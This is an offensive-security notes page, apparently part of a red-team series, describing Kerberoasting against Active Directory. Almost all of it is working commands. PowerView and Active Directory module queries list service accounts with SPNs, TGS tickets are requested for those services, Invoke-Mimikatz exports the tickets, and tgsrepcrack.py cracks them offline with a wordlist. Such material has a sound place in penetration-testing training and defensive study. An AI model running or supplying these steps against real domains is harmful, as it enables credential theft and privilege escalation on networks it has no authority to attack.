KERBEROASTING

Kerberoasting attack can be mainly used for vertical and horizontal privilege escalation

Kerberoasting the services which uses Machine Account is simply a waste of time, because machine account uses complex passwords which cannot be found from its hash value

Kerberoasting is widely targeted on services which are using User Accounts

Enumerating services which uses User Accounts on current domain

PowerView

Get-NetUser -SPN

Active Directory Module

 Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName

Kerberoasting a user account of a service, gives you the same privilege as the user account

Requesting a new TGS to the service from an user account

PowerView

Request-SPNTicket -SPN <SPN FQDN>

Active Directory Module

Add-Type -AssemblyNAme System.IdentityModel

New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList <SPN FQDN>

Verifying tickets using klist

Exporting the tickets to crack the hash

Invoke-Mimikatz -Command '"kerberos::list /export"'

Cracking this TGS ticket using passwords list (Will not be successful everytime, depends on the password list)

 python .\tgsrepcrack.py <WORDLIST> <TOKEN FILE>

CRACK

PreviousDOMAIN PRIVILEGE ESCALATION NextAS-REP ROASTING

Last updated 3 years ago